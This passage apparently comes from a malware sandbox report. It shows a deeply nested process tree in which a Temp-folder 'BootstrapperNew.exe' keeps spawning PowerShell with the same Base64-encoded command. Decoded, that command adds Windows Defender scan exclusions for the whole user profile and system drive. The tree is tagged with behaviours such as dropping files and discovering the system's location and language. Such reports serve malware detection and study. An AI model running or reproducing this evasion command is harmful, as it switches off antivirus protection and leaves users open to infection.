        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        198⤵
        
        PID:4280
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        198⤵
        System Location Discovery: System Language Discovery
        
        PID:6568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        199⤵
        
        PID:5208
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        199⤵
        
        PID:7712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        200⤵
        System Location Discovery: System Language Discovery
        
        PID:4452
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        200⤵
        Drops file in Windows directory
        
        PID:7380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        201⤵
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        201⤵
        Drops file in Windows directory
        
        PID:6892
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        202⤵
        System Location Discovery: System Language Discovery
        
        PID:6196
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        202⤵
        
        PID:3720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        203⤵
        
        PID:7036
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        204⤵
        
        PID:7328
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        203⤵
        Drops file in Windows directory
        
        PID:7988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        204⤵
        
        PID:7696
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        204⤵
        
        PID:2600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        205⤵
        
        PID:5292
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        206⤵
        
        PID:5796
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        205⤵
        
        PID:5544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        206⤵
        
        PID:6324
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        206⤵
        Drops file in Windows directory
        
        PID:6936
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        207⤵
        
        PID:5540
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        207⤵
        Checks computer location settings
        
        PID:2784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        208⤵
        
        PID:7796
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        208⤵
        
        PID:392
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        209⤵
        
        PID:1628
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        209⤵
        System Location Discovery: System Language Discovery
        
        PID:1744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        210⤵
        
        PID:6436
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        210⤵
        Checks computer location settings
        
        PID:7112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        211⤵
        
        PID:6832
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        211⤵
        
        PID:7144
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        212⤵
        
        PID:7772
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        213⤵
        
        PID:5528
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        212⤵
        Checks computer location settings
        
        PID:5772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        213⤵
        
        PID:2164
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        213⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:7700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        214⤵
        
        PID:1212
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        214⤵
        
        PID:6084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        215⤵
        
        PID:8016
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        215⤵
        
        PID:4424
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        216⤵
        
        PID:7292
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        216⤵
        
        PID:7020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        217⤵
        
        PID:6012
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        217⤵
        
        PID:7504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        218⤵
        
        PID:2488
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        219⤵
        
        PID:2112
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        218⤵
        
        PID:5196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        219⤵
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        219⤵
        
        PID:1732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        220⤵
        
        PID:8036
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        220⤵
        
        PID:8164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        221⤵
        
        PID:1268
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        221⤵
        Drops file in Windows directory
        
        PID:4020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        222⤵
        
        PID:2024
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        222⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:5808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        223⤵
        
        PID:3224
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        223⤵
        
        PID:5780
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        224⤵
        
        PID:7112
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        224⤵
        Drops file in Windows directory
        
        PID:8176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        225⤵
        
        PID:7056
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        225⤵
        
        PID:2756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        226⤵
        System Location Discovery: System Language Discovery
        
        PID:6076
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        226⤵
        
        PID:5584
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        227⤵
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        227⤵
        Checks computer location settings
        
        PID:6464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        228⤵
        
        PID:5764
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        228⤵
        
        PID:7244
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
